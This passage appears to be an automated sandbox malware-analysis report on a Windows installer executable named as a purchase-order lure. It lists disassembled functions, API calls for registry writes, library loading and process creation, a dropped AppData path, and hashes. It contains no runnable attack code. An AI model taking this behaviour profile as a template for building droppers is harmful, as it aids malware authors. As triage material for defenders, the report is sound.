                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-502685712
                                                                                              • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                              • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                              • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                              • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401FC3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 710 401fc3-401fcf 711 401fd5-401feb call 402bbf * 2 710->711 712 40208e-402090 710->712 723 401ffb-40200a LoadLibraryExW 711->723 724 401fed-401ff9 GetModuleHandleW 711->724 713 4021dc-4021e1 call 401423 712->713 719 402a4c-402a5b 713->719 720 40281e-402825 713->720 720->719 725 402087-402089 723->725 726 40200c-40201b call 406499 723->726 724->723 724->726 725->713 730 402056-40205b call 4051af 726->730 731 40201d-402023 726->731 736 402060-402063 730->736 732 402025-402031 call 401423 731->732 733 40203c-402054 731->733 732->736 744 402033-40203a 732->744 733->736 736->719 737 402069-402073 call 403839 736->737 737->719 743 402079-402082 FreeLibrary 737->743 743->719 744->736
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                              • String ID: `OC
                                                                                              • API String ID: 334405425-799166930
                                                                                              • Opcode ID: 8e94686a10659349c404390c89b8fa7d2236a9bf12bd9f6309b2655a234b5092
                                                                                              • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                              • Opcode Fuzzy Hash: 8e94686a10659349c404390c89b8fa7d2236a9bf12bd9f6309b2655a234b5092
                                                                                              • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 745 405f1d-405f4f RegOpenKeyExW 746 405f91-405f94 745->746 747 405f51-405f70 RegQueryValueExW 745->747 748 405f72-405f76 747->748 749 405f7e 747->749 750 405f81-405f8b RegCloseKey 748->750 751 405f78-405f7c 748->751 749->750 750->746 751->749 751->750
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                                              • RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: : Completed
                                                                                              • API String ID: 3677997916-2954849223
                                                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                              • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                              • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 752 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 759 4023c7-4023cf 752->759 760 402a4c-402a5b 752->760 761 4023d1-4023de call 402bbf lstrlenW 759->761 762 4023e2-4023e5 759->762 761->762 765 4023f5-4023f8 762->765 766 4023e7-4023f4 call 402ba2 762->766 770 402409-40241d RegSetValueExW 765->770 771 4023fa-402404 call 403027 765->771 766->765 773 402422-4024fc RegCloseKey 770->773 774 40241f 770->774 771->770 773->760 774->773
                                                                                              APIs
                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                              • lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1356686001-0
                                                                                              • Opcode ID: e2698b925e538eb08bc3287f57d952c30838c56ac3af43e8d22cca89afe3aac8
                                                                                              • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                                                              • Opcode Fuzzy Hash: e2698b925e538eb08bc3287f57d952c30838c56ac3af43e8d22cca89afe3aac8
                                                                                              • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B), ref: 0040520A
                                                                                                • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                • Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 3585118688-0
                                                                                              • Opcode ID: c1ff62ea5870f37ba207307ce747ee3e83c7963594fadc4a02c24a9320e89dea
                                                                                              • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                              • Opcode Fuzzy Hash: c1ff62ea5870f37ba207307ce747ee3e83c7963594fadc4a02c24a9320e89dea
                                                                                              • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                • Part of subcall function 0040567E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten,?,00000000,000000F0), ref: 00401645
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten, xrefs: 00401638
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten
                                                                                              • API String ID: 1892508949-4006481345
                                                                                              • Opcode ID: 6dc6f43c6429ba2a5110b6159588fbb8671d59da53183db0781c9cb694e3a690
                                                                                              • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                              • Opcode Fuzzy Hash: 6dc6f43c6429ba2a5110b6159588fbb8671d59da53183db0781c9cb694e3a690
                                                                                              • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 00405743
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                              • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                              • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                              • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                              • RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Enum$CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 167947723-0
                                                                                              • Opcode ID: 58791b35822ebf987f34c85fd11d5e7110b4779ceafcebdb4e355afaf954f7bb
                                                                                              • Instruction ID: f1a23a851f53a7f1557dfd10c54e6723b1dbb9afb6220ffeee8eb14207b379e7
                                                                                              • Opcode Fuzzy Hash: 58791b35822ebf987f34c85fd11d5e7110b4779ceafcebdb4e355afaf954f7bb
                                                                                              • Instruction Fuzzy Hash: 2BF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                              • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                              • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                              • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 849931509-0
                                                                                              • Opcode ID: 2ce4d637b6428a55ca1d1321f0026fb0473b46bdb20893122d5ac17927a2b1c8
                                                                                              • Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
                                                                                              • Opcode Fuzzy Hash: 2ce4d637b6428a55ca1d1321f0026fb0473b46bdb20893122d5ac17927a2b1c8
                                                                                              • Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405282 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 00405292
                                                                                                • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004052DE
